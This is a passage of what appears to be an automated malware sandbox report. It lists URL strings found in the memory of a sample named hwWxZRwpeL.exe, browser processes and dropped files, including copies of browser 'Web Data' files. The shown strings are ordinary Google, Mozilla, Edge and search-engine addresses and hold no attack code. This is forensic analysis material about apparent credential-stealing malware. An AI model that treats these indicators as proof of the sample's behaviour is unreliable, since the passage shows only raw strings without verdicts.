                      Source: chrome.exe, 00000002.00000003.2185983143.00002B4400BC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2154158801.00002B4400BCC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2133329244.00002B4400BC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2150785587.00002B4400BC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2128194296.00002B4400BCC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.ico
                      Source: hwWxZRwpeL.exe, 00000000.00000002.2589210016.000000000080F000.00000004.00000020.00020000.00000000.sdmp, CFCGIIEH.0.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                      Source: chrome.exe, 00000002.00000003.2185983143.00002B4400BC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2154158801.00002B4400BCC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2133329244.00002B4400BC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2150785587.00002B4400BC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2128194296.00002B4400BCC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icormat
                      Source: ECAFHDBGHJ.exe.0.drString found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/device.js/0.2.7/device.min.js
                      Source: hwWxZRwpeL.exe, 00000000.00000002.2589210016.000000000080F000.00000004.00000020.00020000.00000000.sdmp, Web Data.9.dr, AEBGIEGC.0.dr, CFCGIIEH.0.drString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                      Source: hwWxZRwpeL.exe, 00000000.00000002.2589210016.000000000080F000.00000004.00000020.00020000.00000000.sdmp, Web Data.9.dr, AEBGIEGC.0.dr, CFCGIIEH.0.drString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                      Source: chrome.exe, 00000002.00000003.2127412761.00002B4400D1C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000007.00000002.2323860867.000046280017C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore
                      Source: manifest.json.9.drString found in binary or memory: https://chrome.google.com/webstore/
                      Source: chrome.exe, 00000002.00000003.2131213984.00002B4400D1C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2127371019.00002B4400CD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2133052940.00002B4400CEC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2129133467.00002B4400CEC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2137561672.00002B4400D1C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2127392890.00002B4400CEC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2127412761.00002B4400D1C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstoreLDDiscover
                      Source: chrome.exe, 00000002.00000003.2154791159.00002B440169C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2119302630.0000745800728000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2155177550.00002B44016A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2119191592.000074580071C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2152926565.00002B44016A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromekanonymity-pa.googleapis.com/2%
                      Source: chrome.exe, 00000002.00000003.2154791159.00002B440169C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2119302630.0000745800728000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2155177550.00002B44016A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2119191592.000074580071C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2152926565.00002B44016A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromekanonymityauth-pa.googleapis.com/2$
                      Source: chrome.exe, 00000002.00000003.2158726813.00002B4401780000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromekanonymityquery-pa.googleapis.com/
                      Source: chrome.exe, 00000002.00000003.2154791159.00002B440169C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2119302630.0000745800728000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2155177550.00002B44016A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2119191592.000074580071C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2152926565.00002B44016A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromekanonymityquery-pa.googleapis.com/2O
                      Source: msedge.exe, 00000007.00000002.2323860867.000046280017C000.00000004.00000800.00020000.00000000.sdmp, manifest.json.9.drString found in binary or memory: https://chromewebstore.google.com/
                      Source: 66bd3064-2674-43ba-b900-94ce976fd08c.tmp.10.dr, 336af243-ee73-4259-a905-87041dfb975d.tmp.10.drString found in binary or memory: https://clients2.google.com
                      Source: chrome.exe, 00000002.00000003.2115777959.00002B64002E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2115762070.00002B64002D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://clients2.google.com/cr/report
                      Source: chrome.exe, 00000002.00000003.2122380362.00002B4400480000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000007.00000002.2321440630.0000462800040000.00000004.00000800.00020000.00000000.sdmp, manifest.json0.9.drString found in binary or memory: https://clients2.google.com/service/update2/crx
                      Source: 66bd3064-2674-43ba-b900-94ce976fd08c.tmp.10.dr, 336af243-ee73-4259-a905-87041dfb975d.tmp.10.drString found in binary or memory: https://clients2.googleusercontent.com
                      Source: hwWxZRwpeL.exe, 00000000.00000002.2589210016.000000000080F000.00000004.00000020.00020000.00000000.sdmp, BKEHDGDGHCBGCAKFIIIE.0.drString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
                      Source: hwWxZRwpeL.exe, 00000000.00000002.2589210016.000000000080F000.00000004.00000020.00020000.00000000.sdmp, BKEHDGDGHCBGCAKFIIIE.0.drString found in binary or memory: https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpg
                      Source: manifest.json0.9.drString found in binary or memory: https://docs.google.com/
                      Source: chrome.exe, 00000002.00000003.2154791159.00002B440169C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2155177550.00002B44016A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2152926565.00002B44016A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/d/1z2sdBwnUF2tSlhl3R2iUlk7gvmSbuLVXOgriPIcJkXQ/preview29
                      Source: chrome.exe, 00000002.00000003.2154158801.00002B4400BCC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2133329244.00002B4400BC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2150785587.00002B4400BC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2128194296.00002B4400BCC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/presentation/?usp=installed_webapp
                      Source: chrome.exe, 00000002.00000003.2154158801.00002B4400BCC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2133329244.00002B4400BC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2150785587.00002B4400BC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2128194296.00002B4400BCC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/presentation/?usp=installed_webappD
                      Source: chrome.exe, 00000002.00000003.2154791159.00002B440169C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2156240401.00002B44016A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2152926565.00002B44016A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2158492197.00002B44016A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/spreadsheets/
                      Source: chrome.exe, 00000002.00000003.2158747660.00002B4401794000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/spreadsheets/installwebapp?usp=chrome_default
                      Source: chrome.exe, 00000002.00000003.2154791159.00002B440169C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2156240401.00002B44016A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2152926565.00002B44016A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2158492197.00002B44016A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/spreadsheets/ogl
                      Source: hwWxZRwpeL.exe, hwWxZRwpeL.exe, 00000000.00000003.2044823834.0000000002550000.00000004.00001000.00020000.00000000.sdmp, hwWxZRwpeL.exe, 00000000.00000002.2611509049.000000006CFD1000.00000002.00000001.01000000.00000007.sdmp, hwWxZRwpeL.exe, 00000000.00000002.2588602641.0000000000400000.00000040.00000001.01000000.00000003.sdmp, hwWxZRwpeL.exe, 00000000.00000002.2589754739.0000000002470000.00000040.00001000.00020000.00000000.sdmp, chrome.dll.0.drString found in binary or memory: https://docs.rs/getrandom#nodejs-es-module-support
                      Source: manifest.json0.9.drString found in binary or memory: https://drive-autopush.corp.google.com/
                      Source: manifest.json0.9.drString found in binary or memory: https://drive-daily-0.corp.google.com/
                      Source: manifest.json0.9.drString found in binary or memory: https://drive-daily-1.corp.google.com/
                      Source: manifest.json0.9.drString found in binary or memory: https://drive-daily-2.corp.google.com/
                      Source: manifest.json0.9.drString found in binary or memory: https://drive-daily-3.corp.google.com/
                      Source: manifest.json0.9.drString found in binary or memory: https://drive-daily-4.corp.google.com/
                      Source: manifest.json0.9.drString found in binary or memory: https://drive-daily-5.corp.google.com/
                      Source: manifest.json0.9.drString found in binary or memory: https://drive-daily-6.corp.google.com/
                      Source: manifest.json0.9.drString found in binary or memory: https://drive-preprod.corp.google.com/
                      Source: manifest.json0.9.drString found in binary or memory: https://drive-staging.corp.google.com/
                      Source: chrome.exe, 00000002.00000003.2133633558.00002B440120C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive-thirdparty.googleusercontent.com/32/type/
                      Source: manifest.json0.9.drString found in binary or memory: https://drive.google.com/
                      Source: hwWxZRwpeL.exe, 00000000.00000002.2589210016.000000000080F000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2185983143.00002B4400BC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2154158801.00002B4400BCC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2133329244.00002B4400BC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2150785587.00002B4400BC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2128194296.00002B4400BCC000.00000004.00000800.00020000.00000000.sdmp, Web Data.9.dr, AEBGIEGC.0.dr, CFCGIIEH.0.drString found in binary or memory: https://duckduckgo.com/ac/?q=
                      Source: hwWxZRwpeL.exe, 00000000.00000002.2589210016.000000000080F000.00000004.00000020.00020000.00000000.sdmp, Web Data.9.dr, AEBGIEGC.0.dr, CFCGIIEH.0.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
                      Source: hwWxZRwpeL.exe, 00000000.00000002.2589210016.000000000080F000.00000004.00000020.00020000.00000000.sdmp, Web Data.9.dr, AEBGIEGC.0.dr, CFCGIIEH.0.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                      Source: 000003.log5.9.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/addressbar_uu_files.en-gb/1.0.2/asset?sv=2017-07-29&sr
                      Source: 000003.log5.9.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/arbitration_priority_list/4.0.5/asset?assetgroup=Arbit
                      Source: 000003.log5.9.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/arbitration_priority_list/4.0.5/asset?sv=2017-07-29&sr
                      Source: 7bc7b85e-b5d8-4a49-9003-de0b73c7087d.tmp.9.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_M365_dark.png/1.7.32/asset
                      Source: 7bc7b85e-b5d8-4a49-9003-de0b73c7087d.tmp.9.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_M365_hc.png/1.7.32/asset
                      Source: 7bc7b85e-b5d8-4a49-9003-de0b73c7087d.tmp.9.dr, HubApps Icons.9.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_M365_light.png/1.7.32/asset
                      Source: 7bc7b85e-b5d8-4a49-9003-de0b73c7087d.tmp.9.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_action_center_hc.png/1.2.1/asset
                      Source: 7bc7b85e-b5d8-4a49-9003-de0b73c7087d.tmp.9.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_action_center_maximal_dark.png/1.2.1/ass
                      Source: 7bc7b85e-b5d8-4a49-9003-de0b73c7087d.tmp.9.dr, HubApps Icons.9.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_action_center_maximal_light.png/1.2.1/as
                      Source: 7bc7b85e-b5d8-4a49-9003-de0b73c7087d.tmp.9.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_amazon_music_light.png/1.4.13/asset
                      Source: 7bc7b85e-b5d8-4a49-9003-de0b73c7087d.tmp.9.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_apple_music.png/1.4.12/asset
                      Source: 7bc7b85e-b5d8-4a49-9003-de0b73c7087d.tmp.9.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_active_dark.png/1.1.17/asset
                      Source: 7bc7b85e-b5d8-4a49-9003-de0b73c7087d.tmp.9.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_active_dark.png/1.6.8/asset
                      Source: 7bc7b85e-b5d8-4a49-9003-de0b73c7087d.tmp.9.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_active_light.png/1.1.17/asset
                      Source: 7bc7b85e-b5d8-4a49-9003-de0b73c7087d.tmp.9.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_active_light.png/1.6.8/asset
                      Source: 7bc7b85e-b5d8-4a49-9003-de0b73c7087d.tmp.9.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_hc.png/1.1.17/asset
                      Source: 7bc7b85e-b5d8-4a49-9003-de0b73c7087d.tmp.9.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_hc.png/1.6.8/asset
                      Source: 7bc7b85e-b5d8-4a49-9003-de0b73c7087d.tmp.9.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_deezer.png/1.4.12/asset
                      Source: 7bc7b85e-b5d8-4a49-9003-de0b73c7087d.tmp.9.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_designer_color.png/1.0.14/asset
                      Source: 7bc7b85e-b5d8-4a49-9003-de0b73c7087d.tmp.9.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_designer_hc.png/1.0.14/asset
                      Source: 7bc7b85e-b5d8-4a49-9003-de0b73c7087d.tmp.9.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_edrop_hc.png/1.1.12/asset
                      Source: 7bc7b85e-b5d8-4a49-9003-de0b73c7087d.tmp.9.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_edrop_maximal_dark.png/1.1.12/asset
                      Source: 7bc7b85e-b5d8-4a49-9003-de0b73c7087d.tmp.9.dr, HubApps Icons.9.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_edrop_maximal_light.png/1.1.12/asset
                      Source: 7bc7b85e-b5d8-4a49-9003-de0b73c7087d.tmp.9.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_etree_hc.png/1.2.0/asset
                      Source: 7bc7b85e-b5d8-4a49-9003-de0b73c7087d.tmp.9.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_etree_maximal_dark.png/1.2.0/asset
                      Source: 7bc7b85e-b5d8-4a49-9003-de0b73c7087d.tmp.9.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_etree_maximal_light.png/1.2.0/asset
                      Source: 7bc7b85e-b5d8-4a49-9003-de0b73c7087d.tmp.9.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_excel.png/1.7.32/asset
                      Source: 7bc7b85e-b5d8-4a49-9003-de0b73c7087d.tmp.9.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_facebook_messenger.png/1.5.14/asset
                      Source: 7bc7b85e-b5d8-4a49-9003-de0b73c7087d.tmp.9.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_gaana.png/1.0.3/asset
                      Source: 7bc7b85e-b5d8-4a49-9003-de0b73c7087d.tmp.9.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_hc.png/1.7.1/asset
                      Source: 7bc7b85e-b5d8-4a49-9003-de0b73c7087d.tmp.9.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_hc_controller.png/1.7.1/asset
                      Source: 7bc7b85e-b5d8-4a49-9003-de0b73c7087d.tmp.9.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_hc_joystick.png/1.7.1/asset
                      Source: 7bc7b85e-b5d8-4a49-9003-de0b73c7087d.tmp.9.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_maximal_dark.png/1.7.1/asset
                      Source: 7bc7b85e-b5d8-4a49-9003-de0b73c7087d.tmp.9.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_maximal_dark_controller.png/1.7.1/
                      Source: 7bc7b85e-b5d8-4a49-9003-de0b73c7087d.tmp.9.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_maximal_dark_joystick.png/1.7.1/as
                      Source: 7bc7b85e-b5d8-4a49-9003-de0b73c7087d.tmp.9.dr, HubApps Icons.9.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_maximal_light.png/1.7.1/asset
                      Source: 7bc7b85e-b5d8-4a49-9003-de0b73c7087d.tmp.9.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_maximal_light_controller.png/1.7.1
                      Source: 7bc7b85e-b5d8-4a49-9003-de0b73c7087d.tmp.9.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_maximal_light_joystick.png/1.7.1/a
                      Source: 7bc7b85e-b5d8-4a49-9003-de0b73c7087d.tmp.9.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_history_hc.png/0.1.3/asset
                      Source: 7bc7b85e-b5d8-4a49-9003-de0b73c7087d.tmp.9.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_history_maximal_dark.png/0.1.3/asset
                      Source: 7bc7b85e-b5d8-4a49-9003-de0b73c7087d.tmp.9.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_history_maximal_light.png/0.1.3/asset
                      Source: 7bc7b85e-b5d8-4a49-9003-de0b73c7087d.tmp.9.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_iHeart.png/1.0.3/asset
                      Source: 7bc7b85e-b5d8-4a49-9003-de0b73c7087d.tmp.9.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_image_creator_hc.png/1.0.14/asset
                      Source: 7bc7b85e-b5d8-4a49-9003-de0b73c7087d.tmp.9.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_image_creator_maximal_dark.png/1.0.14/as
                      Source: 7bc7b85e-b5d8-4a49-9003-de0b73c7087d.tmp.9.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_image_creator_maximal_light.png/1.0.14/a
                      Source: 7bc7b85e-b5d8-4a49-9003-de0b73c7087d.tmp.9.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_instagram.png/1.4.13/asset
                      Source: 7bc7b85e-b5d8-4a49-9003-de0b73c7087d.tmp.9.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_ku_gou.png/1.0.3/asset
                      Source: 7bc7b85e-b5d8-4a49-9003-de0b73c7087d.tmp.9.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_last.png/1.0.3/asset
                      Source: 000003.log5.9.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_manifest_gz/4.7.107/asset?assetgroup=Sho
                      Source: 7bc7b85e-b5d8-4a49-9003-de0b73c7087d.tmp.9.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_onenote_dark.png/1.4.9/asset
                      Source: 7bc7b85e-b5d8-4a49-9003-de0b73c7087d.tmp.9.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_onenote_hc.png/1.4.9/asset
                      Source: 7bc7b85e-b5d8-4a49-9003-de0b73c7087d.tmp.9.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_onenote_light.png/1.4.9/asset
                      Source: 7bc7b85e-b5d8-4a49-9003-de0b73c7087d.tmp.9.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_outlook_dark.png/1.9.10/asset
                      Source: 7bc7b85e-b5d8-4a49-9003-de0b73c7087d.tmp.9.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_outlook_hc.png/1.9.10/asset
                      Source: 7bc7b85e-b5d8-4a49-9003-de0b73c7087d.tmp.9.dr, HubApps Icons.9.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_outlook_light.png/1.9.10/asset
                      Source: 7bc7b85e-b5d8-4a49-9003-de0b73c7087d.tmp.9.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_power_point.png/1.7.32/asset
                      Source: 7bc7b85e-b5d8-4a49-9003-de0b73c7087d.tmp.9.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_qq.png/1.0.3/asset
                      Source: 7bc7b85e-b5d8-4a49-9003-de0b73c7087d.tmp.9.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_refresh_dark.png/1.1.12/asset
                      Source: 7bc7b85e-b5d8-4a49-9003-de0b73c7087d.tmp.9.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_refresh_hc.png/1.1.12/asset
                      Source: 7bc7b85e-b5d8-4a49-9003-de0b73c7087d.tmp.9.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_refresh_light.png/1.1.12/asset
                      Source: 7bc7b85e-b5d8-4a49-9003-de0b73c7087d.tmp.9.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_search_hc.png/1.3.6/asset
                      Source: 7bc7b85e-b5d8-4a49-9003-de0b73c7087d.tmp.9.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_search_maximal_dark.png/1.3.6/asset
                      Source: 7bc7b85e-b5d8-4a49-9003-de0b73c7087d.tmp.9.dr, HubApps Icons.9.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_search_maximal_light.png/1.3.6/asset
                      Source: 7bc7b85e-b5d8-4a49-9003-de0b73c7087d.tmp.9.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_dark.png/1.1.12/asset
                      Source: 7bc7b85e-b5d8-4a49-9003-de0b73c7087d.tmp.9.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_dark.png/1.4.0/asset
                      Source: 7bc7b85e-b5d8-4a49-9003-de0b73c7087d.tmp.9.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_dark.png/1.5.13/asset
                      Source: 7bc7b85e-b5d8-4a49-9003-de0b73c7087d.tmp.9.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_hc.png/1.1.12/asset
                      Source: 7bc7b85e-b5d8-4a49-9003-de0b73c7087d.tmp.9.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_hc.png/1.4.0/asset
                      Source: 7bc7b85e-b5d8-4a49-9003-de0b73c7087d.tmp.9.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_hc.png/1.5.13/asset
                      Source: 7bc7b85e-b5d8-4a49-9003-de0b73c7087d.tmp.9.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_light.png/1.1.12/asset
                      Source: 7bc7b85e-b5d8-4a49-9003-de0b73c7087d.tmp.9.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_light.png/1.4.0/asset
                      Source: 7bc7b85e-b5d8-4a49-9003-de0b73c7087d.tmp.9.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_light.png/1.5.13/asset
                      Source: 7bc7b85e-b5d8-4a49-9003-de0b73c7087d.tmp.9.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_shopping_hc.png/1.4.0/asset
                      Source: 7bc7b85e-b5d8-4a49-9003-de0b73c7087d.tmp.9.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_shopping_maximal_dark.png/1.4.0/asset
                      Source: 7bc7b85e-b5d8-4a49-9003-de0b73c7087d.tmp.9.dr, HubApps Icons.9.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_shopping_maximal_light.png/1.4.0/asset
                      Source: 7bc7b85e-b5d8-4a49-9003-de0b73c7087d.tmp.9.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_sound_cloud.png/1.0.3/asset
                      Source: 7bc7b85e-b5d8-4a49-9003-de0b73c7087d.tmp.9.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_spotify.png/1.4.12/asset
                      Source: 7bc7b85e-b5d8-4a49-9003-de0b73c7087d.tmp.9.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_telegram.png/1.0.4/asset
                      Source: 7bc7b85e-b5d8-4a49-9003-de0b73c7087d.tmp.9.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_tidal.png/1.0.3/asset
                      Source: 7bc7b85e-b5d8-4a49-9003-de0b73c7087d.tmp.9.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_toolbox_hc.png/1.5.13/asset
                      Source: 7bc7b85e-b5d8-4a49-9003-de0b73c7087d.tmp.9.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_toolbox_maximal_dark.png/1.5.13/asset
                      Source: 7bc7b85e-b5d8-4a49-9003-de0b73c7087d.tmp.9.dr, HubApps Icons.9.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_toolbox_maximal_light.png/1.5.13/asset
                      Source: 7bc7b85e-b5d8-4a49-9003-de0b73c7087d.tmp.9.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_twitter_light.png/1.0.9/asset
                      Source: 7bc7b85e-b5d8-4a49-9003-de0b73c7087d.tmp.9.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_vk.png/1.0.3/asset
                      Source: 7bc7b85e-b5d8-4a49-9003-de0b73c7087d.tmp.9.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_word.png/1.7.32/asset
                      Source: 7bc7b85e-b5d8-4a49-9003-de0b73c7087d.tmp.9.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_yandex_music.png/1.0.10/asset
                      Source: 000003.log5.9.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/signal_triggers/1.13.3/asset?sv=2017-07-29&sr=c&sig=Nt
                      Source: 7bc7b85e-b5d8-4a49-9003-de0b73c7087d.tmp.9.drString found in binary or memory: https://excel.new?from=EdgeM365Shoreline
                      Source: ECAFHDBGHJ.exe.0.drString found in binary or memory: https://firebase.google.com/docs/web/setup#available-libraries
                      Source: ECAFHDBGHJ.exe.0.drString found in binary or memory: https://fonts.googleapis.com/css2?family=PT
